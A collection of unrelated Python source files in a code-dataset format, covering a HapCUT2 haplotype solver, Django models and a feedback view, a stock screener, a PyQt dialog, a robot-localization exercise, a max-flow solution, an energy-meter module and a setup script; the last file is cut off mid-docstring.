sparse_matrix: csr_array):\n self._sparse_matrix = sparse_matrix\n\n @classmethod\n def from_fragments(\n cls, fragments: Sequence[Sequence[int]], missing_value: int = -1\n ):\n dense_matrix = np.array(fragments, dtype=np.int8)\n sparse_matrix: csr_array\n if missing_value == -1:\n sparse_matrix = csr_array(dense_matrix + 1, dtype=np.int8)\n elif missing_value == 0:\n sparse_matrix = csr_array(dense_matrix, dtype=np.int8)\n else:\n raise ValueError(\n f\"Invalid value for `missing_value`: {missing_value!r}. 
Expecting -1 or 0.\"\n )\n return cls(sparse_matrix)\n\n def get_fragment(self, i: int) -> NDArray:\n return self._sparse_matrix.getrow(i).toarray()[0]\n\n def to_npz(self, file: str | IO) -> None:\n save_npz(file, self._sparse_matrix)\n\n @classmethod\n def from_npz(cls, file: str | IO):\n return cls(load_npz(file))\n\n @classmethod\n def from_json(cls, file: str | IO, missing_value: int = -1):\n fragments: Sequence[Sequence[int]]\n if isinstance(file, str):\n with open(file, \"rt\") as f:\n fragments = json.load(f)\n else:\n fragments = json.load(file)\n return cls.from_fragments(fragments, missing_value=missing_value)\n\n @classmethod\n def from_json_string(cls, string: str, missing_value: int = -1):\n fragments = json.loads(string)\n return cls.from_fragments(fragments, missing_value=missing_value)\n\n @property\n def shape(self) -> tuple[int, int]:\n return self._sparse_matrix.shape\n\n def __len__(self) -> int:\n return self.shape[0]\n\n def __iter__(self) -> Iterator[NDArray]:\n for i in range(len(self)):\n yield self.get_fragment(i)\n\n def _column_sum(self) -> NDArray:\n return np.squeeze(np.asarray(self._sparse_matrix.sum(axis=0)))\n\n def _row_sum(self) -> NDArray:\n return np.squeeze(np.asarray(self._sparse_matrix.sum(axis=1)))\n\n def get_empty_loci(self) -> Sequence[int]:\n return [j for j, total in enumerate(self._column_sum()) if total == 0]\n\n def get_empty_fragments(self) -> Sequence[int]:\n return [i for i, total in enumerate(self._row_sum()) if total == 0]\n\n def get_nonzero_loci(self, i: int) -> Sequence[int]:\n return self._sparse_matrix.getrow(i).nonzero()[1]\n\n\n@dataclass(eq=True)\nclass _MECSolverResult:\n haplotypes: tuple[NDArray, NDArray]\n partition: Sequence[int]\n cost: float\n\n def to_json(self, missing_value: int = -1):\n if missing_value == -1:\n return json.dumps(\n dict(\n haplotypes=[(haplotype - 1).tolist() for haplotype in self.haplotypes],\n partition=list(self.partition),\n cost=float(self.cost),\n )\n )\n elif missing_value == 0:\n return json.dumps(\n dict(\n haplotypes=[haplotype.tolist() for haplotype in self.haplotypes],\n partition=list(self.partition),\n cost=float(self.cost),\n )\n )\n else:\n raise ValueError(\n f\"Invalid value for `missing_value`: {missing_value!r}. 
Expecting -1 or 0.\"\n )\n\n\nclass MECSolver:\n def __init__(self, matrix: AlleleMatrix):\n self.matrix: AlleleMatrix = matrix\n self._empty_loci = matrix.get_empty_loci()\n\n @classmethod\n def from_fragments(cls, fragments: Sequence[Sequence[int]]):\n matrix = AlleleMatrix.from_fragments(fragments)\n return cls(matrix)\n\n @property\n def n_locus(self) -> int:\n return self.matrix.shape[1]\n\n @property\n def n_fragment(self) -> int:\n return self.matrix.shape[0]\n\n @staticmethod\n def _make_vcf(\n n_locus: int,\n output_path: str,\n *,\n ref_alleles: Sequence[str] | None = None,\n alt_alleles: Sequence[str] | None = None,\n genotypes: Sequence[str] | None = None,\n ) -> None:\n VCF_HEADER = [\n \"#CHROM\",\n \"POS\",\n \"ID\",\n \"REF\",\n \"ALT\",\n \"QUAL\",\n \"FILTER\",\n \"INFO\",\n \"FORMAT\",\n \"Sample_0\",\n ]\n chromosome = [\"ref\"] * n_locus\n pos = [i * 100 + 1 for i in range(n_locus)]\n variant_id = [\".\"] * n_locus\n ref = [\"A\"] * n_locus if ref_alleles is None else ref_alleles\n alt = [\"T\"] * n_locus if alt_alleles is None else alt_alleles\n qual = [60] * n_locus\n filter_ = [\".\"] * n_locus\n info = [\".\"] * n_locus\n format_ = [\"GT\"] * n_locus\n gt = [\".\"] * n_locus if genotypes is None else genotypes\n data = {\n k: v\n for k, v in zip(\n VCF_HEADER,\n [\n chromosome,\n pos,\n variant_id,\n ref,\n alt,\n qual,\n filter_,\n info,\n format_,\n gt,\n ],\n )\n }\n df = pd.DataFrame(data)\n df.to_csv(output_path, index=False, sep=\"\\t\")\n\n def _make_fragments(self, output_path: str, *, fragment_names=None) -> None:\n n_fragment, n_locus = self.n_fragment, self.n_locus\n matrix = self.matrix\n _fragment_names = (\n [f\"F{i+1}\" for i in range(n_fragment)]\n if fragment_names is None\n else fragment_names\n )\n\n FRAGMENT_TYPE = 0 # 0 for normal, 1 for HiC\n BARCODE = -1\n MATE_INDEX = -1\n\n with open(output_path, \"wt\") as f:\n for i, fragment in enumerate(self.matrix):\n nonzero_loci = self.matrix.get_nonzero_loci(i)\n\n block_start_indices: list[int] = []\n previous_j: int = -1\n for j in nonzero_loci:\n if j == 0 or j != previous_j + 1:\n block_start_indices.append(j)\n previous_j = j\n\n fragment_string = \"\".join(\n [str(a) if a >= 0 else \" \" for a in fragment - 1]\n )\n blocks: list[str] = [\n block for block in fragment_string.strip(\" \").split(\" \") if block\n ]\n quality_string = \".\" * len(nonzero_loci)\n block_string = \" \".join(\n [f\"{s+1} {b}\" for s, b in zip(block_start_indices, blocks)]\n )\n\n line = f\"{len(blocks)} {_fragment_names[i]} {FRAGMENT_TYPE} {BARCODE} {MATE_INDEX} {block_string} {quality_string}\\n\"\n f.write(line)\n\n def _run_hapcut2(\n self,\n fragments_path: str,\n vcf_path: str,\n output_path: str,\n *,\n prune=False,\n call_homozygous=False,\n verbose=False,\n ) -> None:\n directory = os.path.commonprefix([fragments_path, vcf_path, output_path])\n command = [\n \"hapcut2\",\n \"--fragments\",\n fragments_path,\n \"--VCF\",\n vcf_path,\n \"--output\",\n output_path,\n \"--outvcf\",\n \"0\",\n \"--call_homozygous\",\n \"1\" if call_homozygous else \"0\",\n \"--new_format\",\n \"1\",\n \"--verbose\",\n \"0\",\n \"--error_analysis_mode\",\n str(int(not prune)),\n ]\n with subprocess.Popen(\n command,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n text=True,\n encoding=\"utf-8\",\n ) as process:\n if verbose and process.stderr is not None:\n for line in process.stderr:\n print(line, file=sys.stderr, flush=True)\n process.communicate()\n\n def _parse_hapcut2_result(self, file_path: str) -> tuple[NDArray, 
NDArray]:\n haplotype_0: list[int] = []\n haplotype_1: list[int] = []\n\n file_is_empty: bool = True\n with open(file_path, \"r\") as f:\n for line in f:\n file_is_empty = False\n if line.startswith(\"BLOCK\"):\n continue\n elif line.startswith(\"*\"):\n continue\n else:\n columns = line.strip(\"\\n\").split(\"\\t\")\n haplotype_0.append(int(columns[1]) + 1 if columns[1] != \"-\" else 0)\n haplotype_1.append(int(columns[2]) + 1 if columns[2] != \"-\" else 0)\n\n if file_is_empty:\n raise IOError(\"HapCUT2 output file is empty.\")\n if len(haplotype_0) == 0 or len(haplotype_1) == 0:\n raise RuntimeError(\"Failed to parse HapCUT2 output file.\")\n\n for j in self._empty_loci:\n haplotype_0.insert(j, 0)\n haplotype_1.insert(j, 0)\n\n return (\n np.array(haplotype_0, dtype=np.int8),\n np.array(haplotype_1, dtype=np.int8),\n )\n\n @staticmethod\n def _get_cost(haplotype: NDArray, fragment: NDArray) -> int:\n return ((haplotype != fragment) & (fragment > 0)).sum()\n\n def _partition_fragments(\n self, haplotypes: tuple[NDArray, NDArray]\n ) -> tuple[Sequence[int], float]:\n n_fragment, n_variant = self.n_fragment, self.n_locus\n n_haplotype = len(haplotypes)\n partition: list[int] = []\n total_cost: float = 0\n\n empty_fragments = set(self.matrix.get_empty_fragments())\n for i, fragment in enumerate(self.matrix):\n if i in empty_fragments:\n partition.append(-1)\n continue\n min_cost = float(\"inf\")\n haplotype_index: int = -1\n for i, haplotype in enumerate(haplotypes):\n cost = self._get_cost(haplotype, fragment)\n if cost < min_cost:\n min_cost = cost\n haplotype_index = i\n partition.append(haplotype_index)\n total_cost += min_cost\n return tuple(partition), total_cost\n\n def solve(\n self, *, call_homozygous=False, latency_wait: float = 2, verbose=False\n ) -> _MECSolverResult:\n with tempfile.TemporaryDirectory() as temp_directory:\n vcf_path = os.path.join(temp_directory, \"variants.vcf\")\n fragments_path = os.path.join(temp_directory, \"fragments.txt\")\n output_path = os.path.join(temp_directory, \"hapcut2.txt\")\n if verbose:\n print(f\"Making input VCF file for HapCUT2\", file=sys.stderr, flush=True)\n self._make_vcf(self.n_locus, vcf_path)\n if verbose:\n print(\n f\"Making input fragment file for HapCUT2\",\n file=sys.stderr,\n flush=True,\n )\n self._make_fragments(fragments_path)\n if verbose:\n print(f\"Running HapCUT2\", file=sys.stderr, flush=True)\n self._run_hapcut2(\n fragments_path,\n vcf_path,\n output_path,\n call_homozygous=call_homozygous,\n verbose=verbose,\n )\n time.sleep(latency_wait)\n if verbose:\n print(\"Parsing HapCUT2 output\", file=sys.stderr, flush=True)\n try:\n haplotypes = self._parse_hapcut2_result(output_path)\n except IOError:\n raise IOError(\n \"Failed to read HapCUT2 output file. 
Try setting a larger value for `latency_wait`.\"\n )\n if verbose:\n print(\"Partitioning fragments\", file=sys.stderr, flush=True)\n partition, cost = self._partition_fragments(haplotypes)\n return _MECSolverResult(\n haplotypes=haplotypes, partition=partition, cost=cost\n )\n\n\ndef solve_MEC(\n fragments: Sequence[Sequence[int]], *, call_homozygous=False, **kw\n) -> tuple[tuple[Sequence[int], Sequence[int]], Sequence[int], int]:\n solver = MECSolver.from_fragments(fragments)\n result = solver.solve(call_homozygous=call_homozygous, **kw)\n haplotype_1, haplotype_2 = result.haplotypes\n return (\n (tuple(haplotype_1 - 1), tuple(haplotype_2 - 1)),\n tuple(result.partition),\n result.cost,\n )\n","repo_name":"jzhang-dev/hapcut2-mec-solver","sub_path":"src/hapcut2_mec_solver/hapcut2_mec_solver.py","file_name":"hapcut2_mec_solver.py","file_ext":"py","file_size_in_byte":12860,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"47"} +{"seq_id":"24102699739","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.db.models.deletion import CASCADE\n# Create your models here.\n\nclass Director(models.Model):\n name = models.CharField(max_length=100)\n\n def __str__(self) -> str:\n return self.name\n\nclass Movie(models.Model):\n title = models.CharField(max_length=100)\n description = models.TextField()\n duration = models.FloatField()\n director = models.ForeignKey(Director, on_delete=models.CASCADE, related_name=\"director_name\")\n\n def __str__(self) -> str:\n return self.title\n\n @property\n def raiting(self):\n reviews = Review.objects.filter(movie=self)\n sum_ = 0\n for i in reviews:\n sum_ += i.stars\n try:\n return sum_/reviews.count()\n except:\n return 0\n \n\nclass Review(models.Model):\n stars = models.IntegerField(default=5)\n text = models.TextField()\n movie = models.ForeignKey(Movie, on_delete=models.CASCADE, related_name=\"review\")\n author = models.ForeignKey(User, on_delete=models.CASCADE, null=True , blank=True)\n\n def __str__(self) -> str:\n return self.text\n\n\n ","repo_name":"Dierb/db-hw","sub_path":"afisha/movie_app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"1617568096","text":"import datetime as dt\nfrom typing import List\n\nimport pandas as pd\nimport yfinance as yf\nfrom pandas_datareader import data as pdr\nfrom yahoo_fin import stock_info as si\n\nyf.pdr_override()\n\n\"\"\"\nhttps://towardsdatascience.com/making-a-stock-screener-with-python-4f591b198261\n\"\"\"\n\n\nclass StockScreener:\n \"\"\"\n Stock Screener object.\n \"\"\"\n\n def __init__(self, index_ticker: str, stock_list: List[str]) -> None:\n \"\"\"\n Constructor for the Stock Screener object.\n\n :param index_ticker: String representing the ticker for the index (required for the calculation for RS rating)\n :param stock_list: List of Strings representing the stocks in the index\n \"\"\"\n self.index_ticker = index_ticker\n self.stock_list = stock_list\n\n self.end_date = dt.datetime.now()\n self.start_date = self.end_date - dt.timedelta(days=365)\n\n self.stocks_of_interest = []\n\n def get_index_return(self) -> float:\n \"\"\"\n Gets the returns of the index. 
Used for calculations for RS ratings.\n\n :return: Float representing the returns of the index\n \"\"\"\n print(f\"\\npulling {self.index_ticker}\")\n index_df = pdr.get_data_yahoo(self.index_ticker, start=self.start_date, end=self.end_date)\n index_df['percent_change'] = index_df['Adj Close'].pct_change()\n\n return index_df['percent_change'].sum() * 100\n\n @staticmethod\n def get_rs_rating(df: pd.DataFrame, index_return: float) -> float:\n \"\"\"\n Gets the RS ratings.\n\n :param df: DataFrame representing the stock\n :param index_return: Float representing the returns of the index\n :return: Float representing the RS ratings\n \"\"\"\n df['percent_change'] = df['Adj Close'].pct_change()\n stock_return = df['percent_change'].sum() * 100\n\n return round((stock_return / index_return) * 10, 2)\n\n @staticmethod\n def get_current_close(df: pd.DataFrame) -> float:\n \"\"\"\n Gets the current adjusted closing price of the stock.\n\n :param df: DataFrame representing the stock\n :return: Float representing the Adjusted Closing Price\n \"\"\"\n return df['Adj Close'][-1]\n\n @staticmethod\n def get_sma_50(df: pd.DataFrame) -> float:\n \"\"\"\n Gets the latest value of the 50 Day Simple Moving Average of the stock.\n\n :param df: DataFrame representing the stock\n :return: Float representing the 50 Day SMA\n \"\"\"\n df['sma_50'] = round(df['Adj Close'].rolling(window=50).mean(), 2)\n\n return df['sma_50'][-1]\n\n @staticmethod\n def get_sma_150(df: pd.DataFrame) -> float:\n \"\"\"\n Gets the latest value of the 150 Day Simple Moving Average of the stock.\n\n :param df: DataFrame representing the stock\n :return: Float representing the latest value of the 150 Day SMA\n \"\"\"\n df['sma_150'] = round(df['Adj Close'].rolling(window=150).mean(), 2)\n\n return df['sma_150'][-1]\n\n @staticmethod\n def get_sma_200(df: pd.DataFrame) -> float:\n \"\"\"\n Gets the latest value of the 200 Day Simple Moving Average of the stock\n\n :param df: DataFrame representing the stock\n :return: Float representing the latest value of the 200 Day SMA\n \"\"\"\n df['sma_200'] = round(df['Adj Close'].rolling(window=200).mean(), 2)\n\n return df['sma_200'][-1]\n\n @staticmethod\n def get_sma_200_20(df: pd.DataFrame) -> float:\n \"\"\"\n Gets the previous 1 month value of the 200 Day Simple Moving Average of the stock.\n\n :param df: DataFrame representing the stock\n :return: Float representing the previous 1 month value of the 200 Day SMA\n \"\"\"\n return df['sma_200'][-20]\n\n @staticmethod\n def get_low_52_week(df: pd.DataFrame) -> float:\n \"\"\"\n Gets the 52 week low price.\n\n :param df: DataFrame representing the stock\n :return: Float representing the 52 week low price\n \"\"\"\n return min(df['Adj Close'][-260:])\n\n @staticmethod\n def get_high_52_week(df: pd.DataFrame) -> float:\n \"\"\"\n Gets the 52 week high price\n\n :param df: DataFrame representing the stock\n :return: Float representing the 52 week high price\n \"\"\"\n return max(df['Adj Close'][-260:])\n\n def get_stocks(self) -> pd.DataFrame:\n \"\"\"\n Screens the stocks and selects based on 8 conditions.\n\n Condition 1: Current Price > 150 SMA and > 200 SMA\n Condition 2: 150 SMA and > 200 SMA\n Condition 3: 200 SMA trending up for at least 1 month (ideally 4-5 months)\n Condition 4: 50 SMA > 150 SMA and 50 SMA > 200 SMA\n Condition 5: Current Price > 50 SMA\n Condition 6: Current Price is at least 30% above 52 week low (many of the best are up to 100-300% before coming out of consolidation)\n Condition 7: Current Price is within 25% of 52 
week high\n Condition 8: IBD RS rating is greater than 70\n\n :return: DataFrame representing the selected stocks\n \"\"\"\n print('Beginning screening process...\\n')\n len_stock_list = len(self.stock_list)\n\n index_return = self.get_index_return() # used for RS rating\n\n for counter, stock in enumerate(self.stock_list):\n try:\n print(f\"\\npulling {stock} with index {counter}/{len_stock_list}\")\n df = pdr.get_data_yahoo(stock, start=self.start_date, end=self.end_date)\n\n assert 'Adj Close' in df.columns, 'column Adj Close is missing from dataframe!'\n\n rs_rating = self.get_rs_rating(df, index_return)\n current_close = self.get_current_close(df)\n sma_50 = self.get_sma_50(df)\n sma_150 = self.get_sma_150(df)\n sma_200 = self.get_sma_200(df)\n low_52_week = self.get_low_52_week(df)\n high_52_week = self.get_high_52_week(df)\n\n sma_200_20 = self.get_sma_200_20(df)\n\n condition_1 = current_close > sma_150 > sma_200\n condition_2 = sma_150 > sma_200\n condition_3 = sma_200 > sma_200_20\n condition_4 = sma_50 > sma_150 > sma_200\n condition_5 = current_close > sma_50\n condition_6 = current_close >= 1.3 * low_52_week\n condition_7 = current_close >= (0.75 * high_52_week)\n condition_8 = rs_rating >= 70\n\n if condition_1 and condition_2 and condition_3 and condition_4 and condition_5 and condition_6 and condition_7 and condition_8:\n self.stocks_of_interest.append({\n 'Date': self.end_date,\n 'Counter': counter,\n 'Ticker': stock,\n 'RS Rating': rs_rating,\n 'Current Close': current_close,\n '50 Day MA': sma_50,\n '150 Day MA': sma_150,\n '200 Day MA': sma_200,\n '52 Week Low': low_52_week,\n '52 Week High': high_52_week\n })\n\n print(f\"{stock} match the requirements\")\n\n except Exception as e:\n print(e)\n print(f\"An error occurred while pulling data for {stock}\")\n\n print('\\nScreening completed!')\n return pd.DataFrame(self.stocks_of_interest)\n\n\nif __name__ == '__main__':\n index_ticker = '^GSPC'\n stock_list = si.tickers_sp500()\n\n sc = StockScreener(index_ticker, stock_list)\n df_interest = sc.get_stocks()\n print(df_interest)\n\n df_interest.to_csv(f'stock_screener_output.csv', index=False)\n","repo_name":"ErnestChng/market_screener","sub_path":"stocks/stock_screener.py","file_name":"stock_screener.py","file_ext":"py","file_size_in_byte":7720,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"29875795118","text":"from PyQt5 import QtCore, QtWidgets, QtGui\n\n\nclass Ui_Dialog(object):\n\n def __init__(self, Dialog, allow_cancel=False, entry=False):\n self.dialog = Dialog\n self.vertical_layout = QtWidgets.QVBoxLayout(Dialog)\n self.label = QtWidgets.QLabel(Dialog)\n self.button_box = QtWidgets.QDialogButtonBox(Dialog)\n self.allow_cancel = allow_cancel\n self.entry = entry\n\n def setupUi(self):\n self.dialog.setWindowTitle(\"Login\")\n self.vertical_layout.setSizeConstraint(QtWidgets.QLayout.SetFixedSize)\n self.vertical_layout.addWidget(self.label, 0, QtCore.Qt.AlignTop)\n self.button_box.setOrientation(QtCore.Qt.Horizontal)\n\n self.dialog.setWindowFlags(QtCore.Qt.WindowCloseButtonHint | QtCore.Qt.WindowTitleHint)\n if self.allow_cancel:\n self.button_box.setStandardButtons(QtWidgets.QDialogButtonBox.Ok | QtWidgets.QDialogButtonBox.Cancel)\n else:\n self.button_box.setStandardButtons(QtWidgets.QDialogButtonBox.Ok)\n self.button_box.setCenterButtons(True)\n self.vertical_layout.addWidget(self.button_box)\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label.setFont(font)\n 
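# Route the standard buttons to QDialog's built-in accept()/reject() slots, so Ok\n        # closes the dialog with Accepted and Cancel (when allowed) with Rejected.\n        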
self.button_box.accepted.connect(self.dialog.accept)\n        self.button_box.rejected.connect(self.dialog.reject)\n        QtCore.QMetaObject.connectSlotsByName(self.dialog)\n\n","repo_name":"ghnr/cw-grades-qmul","sub_path":"dialogUI.py","file_name":"dialogUI.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"41948832650","text":"\"\"\" Robot Localization\nThe environment is a 2D plane with only green and red grid cells. The robot localizes itself based on these grid cells. \"\"\"\n\n# The function localize takes the following arguments:\n#\n# colors:\n#        2D list, each entry either 'R' (for red cell) or 'G' (for green cell)\n#\n# measurements:\n#        list of measurements taken by the robot, each entry either 'R' or 'G'\n#\n# motions:\n#        list of actions taken by the robot, each entry of the form [dy,dx],\n#        where dx refers to the change in the x-direction (positive meaning\n#        movement to the right) and dy refers to the change in the y-direction\n#        (positive meaning movement downward)\n#        NOTE: the *first* coordinate is change in y; the *second* coordinate is\n#        change in x\n#\n# sensor_right:\n#        float between 0 and 1, giving the probability that any given\n#        measurement is correct; the probability that the measurement is\n#        incorrect is 1-sensor_right\n#\n# p_move:\n#        float between 0 and 1, giving the probability that any given movement\n#        command takes place; the probability that the movement command fails\n#        (and the robot remains still) is 1-p_move; the robot will NOT overshoot\n#        its destination in this exercise\n#\n# The function should RETURN (not just show or print) a 2D list (of the same\n# dimensions as colors) that gives the probabilities that the robot occupies\n# each cell in the world.\n#\n# Compute the probabilities by assuming the robot initially has a uniform\n# probability of being in any cell.\n#\n# Also assume that at each step, the robot:\n# 1) first makes a movement,\n# 2) then takes a measurement.\n#\n# Motion:\n#  [0,0] - stay\n#  [0,1] - right\n#  [0,-1] - left\n#  [1,0] - down\n#  [-1,0] - up\n\ndef localize(colors,measurements,motions,sensor_right,p_move):\n    # initializes p to a uniform distribution over a grid of the same dimensions as colors\n    pinit = 1.0 / float(len(colors)) / float(len(colors[0]))\n    p = [[pinit for row in range(len(colors[0]))] for col in range(len(colors))]\n    \n    # >>> Insert your code here <<<\n    for i in range(len(measurements)):\n        p = move(p, motions[i], p_move, colors)\n        p = sense(p, measurements[i], sensor_right, colors)\n\n    return p\n\n\ndef sense(p, measurement, sensor_right, colors):\n    q = [[0.0 for row in range(len(colors[0]))] for col in range(len(colors))]\n    summ = 0.0\n    for y in range(len(colors)):\n        for x in range(len(colors[0])):\n            hit = (measurement == colors[y][x])\n            q[y][x] = p[y][x] * (hit * sensor_right + (1-hit) * (1-sensor_right))\n            summ += q[y][x]\n\n    for i in range(len(q)):\n        for j in range(len(q[i])):\n            q[i][j] = q[i][j] / summ\n\n    return q\n\ndef move(p, motion, p_move, colors):\n    q = [[0.0 for row in range(len(colors[0]))] for col in range(len(colors))]\n    for i in range(len(q)):\n        for j in range(len(q[i])):\n            q[i][j] = (p_move * p[(i - motion[0]) % len(p)][(j - motion[1]) % len(p[i])]) + ((1 - p_move)* p[i][j])\n    return q\n\ndef show(p):\n    for i in range(len(p)):\n        print (p[i])\n
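\n# Worked example of a single sense() update (illustrative numbers, not part of the\n# original exercise): on a 1x2 world colors=[['R','G']] with uniform prior\n# p=[[0.5, 0.5]], measurement 'G' and sensor_right=0.8, the unnormalized posterior\n# is [0.5*0.2, 0.5*0.8] = [0.1, 0.4], which normalizes to [[0.2, 0.8]].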
\n#############################################################\n# For the following test case, your output should be \n# [[0.01105, 0.02464, 0.06799, 0.04472, 0.02465],\n# [0.00715, 0.01017, 0.08696, 0.07988, 0.00935],\n# [0.00739, 0.00894, 0.11272, 0.35350, 0.04065],\n# [0.00910, 0.00715, 0.01434, 0.04313, 0.03642]]\n# (within a tolerance of +/- 0.001 for each entry)\n\ncolors = [['R','G','G','R','R'],\n ['R','R','G','R','R'],\n ['R','R','G','G','R'],\n ['R','R','R','R','R']]\nmeasurements = ['G','G','G','G','G']\nmotions = [[0,0],[0,1],[1,0],[1,0],[0,1]]\n#print (motions[1])\np = localize(colors,measurements,motions,sensor_right = 0.7, p_move = 0.8)\nshow(p) # displays your answer\n ","repo_name":"Gopsee/Artificial-Intelligence-for-Robotics---Udacity","sub_path":"Localization/Robot Localization.py","file_name":"Robot Localization.py","file_ext":"py","file_size_in_byte":4035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"71484141308","text":"from scipy.sparse import csr_matrix\nfrom scipy.sparse.csgraph import maximum_flow\n\n\ndef main() -> None:\n N, _, E = map(int, input().split())\n in_, out, weight = [], [], []\n source, sink = 0, N\n for p in map(int, input().split()):\n in_.append(p)\n out.append(sink)\n weight.append(1)\n for _ in range(E):\n a, b = map(int, input().split())\n in_.append(a)\n out.append(b)\n weight.append(1)\n flow = csr_matrix((weight, (in_, out)), shape=(N+1, N+1))\n print(maximum_flow(flow, source, sink).flow_value)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"knuu/competitive-programming","sub_path":"atcoder/abc/abc010_d_scipy.py","file_name":"abc010_d_scipy.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"7543972014","text":"# Create your views here.\nfrom django.contrib.sites.models import Site\nfrom django.http import HttpResponse\nfrom django.utils.encoding import force_unicode\nfrom django.core.mail import send_mail\n\nimport json\nfrom feedback import forms\n\nimport appsettings\nsettings = appsettings.settings.feedback\n\ndef sanitize(errors):\n dct = dict((str(k),list(force_unicode(a) for a in v)) for k,v in errors.items())\n return dct\n\ndef handle_ajax(request, url):\n if not request.POST:\n return HttpResponse(json.dumps({'error':'no post recieved'}))\n else:\n post = {}\n for k in request.POST:\n post[k] = request.POST[k]\n post['url'] = url\n post['site'] = Site.objects.get_current().id\n form = forms.FeedbackForm(post)\n if form.is_valid():\n form.save()\n if settings.mailto:\n try:\n send_mail('Feedback recived: '+form.cleaned_data['subject'], \n 'email: %s \\n\\n %s'%(form.cleaned_data['email'], form.cleaned_data['text']), \n 'from@example.com',\n [settings.mailto], fail_silently=False)\n except:\n return HttpResponse(json.dumps({'error':'Failed to send email'}))\n return HttpResponse(json.dumps({}))\n else:\n \n return HttpResponse(json.dumps({'errors':sanitize(form.errors)}))\n\n\n","repo_name":"clincher/django-feedback","sub_path":"feedback/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"6"} +{"seq_id":"21937567531","text":"#!/usr/bin/env python3\nfrom modules.common import simcount\nfrom modules.common.component_state import CounterState\nfrom modules.common.fault_state import ComponentInfo\nfrom modules.common.store import 
get_counter_value_store\n\n\ndef get_default_config() -> dict:\n return {\n \"name\": \"LG ESS V1.0 Zähler\",\n \"id\": 0,\n \"type\": \"counter\",\n \"configuration\": {}\n }\n\n\nclass LgCounter:\n def __init__(self, device_id: int, component_config: dict) -> None:\n self.__device_id = device_id\n self.component_config = component_config\n self.__sim_count = simcount.SimCountFactory().get_sim_counter()()\n self.simulation = {}\n self.__store = get_counter_value_store(component_config[\"id\"])\n self.component_info = ComponentInfo.from_component_config(component_config)\n\n def update(self, response) -> None:\n power = float(response[\"statistics\"][\"grid_power\"])\n if response[\"direction\"][\"is_grid_selling_\"] == \"1\":\n power = power*-1\n\n topic_str = \"openWB/set/system/device/{}/component/{}/\".format(\n self.__device_id, self.component_config[\"id\"]\n )\n imported, exported = self.__sim_count.sim_count(\n power,\n topic=topic_str,\n data=self.simulation,\n prefix=\"bezug\"\n )\n counter_state = CounterState(\n imported=imported,\n exported=exported,\n power=power\n )\n self.__store.set(counter_state)\n","repo_name":"StarF666/openWB","sub_path":"packages/modules/lg/counter.py","file_name":"counter.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"6"} +{"seq_id":"8659905065","text":"#!/usr/bin/env python3\n\nimport sys, os\nfrom setuptools import setup\nimport configparser\n\n# ensure python version 3.5 or greater is used\nif (sys.version_info.major + .1 * sys.version_info.minor) < 3.5:\n\tprint('ERROR: please execute setup.py with python version >=3.5')\n\tsys.exit(1)\n\n# get version string from seperate file\n# https://stackoverflow.com/questions/458550/standard-way-to-embed-version-into-python-package\n# https://stackoverflow.com/questions/436198/what-is-an-alternative-to-execfile-in-python-3/437857#437857\nVERSIONFILE=\"dominion/version.py\"\nwith open(VERSIONFILE) as f:\n\tcode = compile(f.read(), VERSIONFILE, 'exec')\n\texec(code)\nif not __version__:\n\tprint(\"ERROR: unable to read version string from file {}\".format(VERSIONFILE))\n\texit()\n\nDESCR = '''dominION - for monitoring, protocoling and analysis of sequencing runs performed on the ONT GridION sequencer'''\n\n# load long description from Markdown file\nwith open('README.md', 'rb') as readme:\n\tLONG_DESCR = readme.read().decode()\n\n# check if defaults for user, host and dest are set for file transfer\nsetup_dir = os.path.dirname(os.path.abspath(__file__))\nconfig = configparser.ConfigParser(allow_no_value=True)\ninifile = os.path.join(setup_dir, \"dominion\", \"resources\", \"defaults.ini\")\nconfig.read(inifile)\nmissing_args = [arg for arg in ['user', 'host', 'dest', 'identity'] if not config['DEFAULT'][arg]]\nif missing_args:\n\tprint(\"Apparently, not all defaults for rsync sequence data transfer where set. 
Please enter the following information:\")\nfor arg in missing_args:\n\tif arg == \"identity\":\n\t\tconfig['DEFAULT'][arg] = input(\"full path to the identity file (private key) for key authentication: \")\n\telse:\n\t\tconfig['DEFAULT'][arg] = input(\"{} for rsync sequence data transfer (as in USER@HOST:DEST): \".format(arg))\nwith open(inifile, 'w') as f:\n\tconfig.write(f)\n\nsetup(name='dominion',\n\t version=__version__,\n\t description=DESCR,\n\t long_description=LONG_DESCR,\n\t url='http://github.com/MarkusHaak/dominION',\n\t author='Markus Haak',\n\t author_email='markus.haak@posteo.net',\n\t license='GPL',\n\t packages=['dominion'],\n\t install_requires=['watchdog', 'numpy', 'pandas', 'matplotlib', 'Jinja2'],\n\t include_package_data=True,\n\t zip_safe=False,\n\t entry_points={\"console_scripts\": ['dominion = dominion.dominion:standalone',\n\t \t\t\t\t\t\t\t\t\t'statsparser = dominion.statsparser:standalone']},\n\t scripts=['bin/watchnchop'])","repo_name":"MarkusHaak/dominION","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2393,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"6930396513","text":"import pandas as pd\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.datasets import make_classification\n\nfrom sklearn.metrics import log_loss\nfrom sklearn.metrics import roc_auc_score\n\n#returns a table of probabilities for the testing data\n\ndef create_probs(X,y,start,end,split,time):\n \"\"\"\n Returns a table of probabilities for the testing data and time horizons being tested. Arguments are as follows:\n \n X: full X data\n y: full y data\n start: start of the dataset\n end: end of the dataset\n split: index position of where you 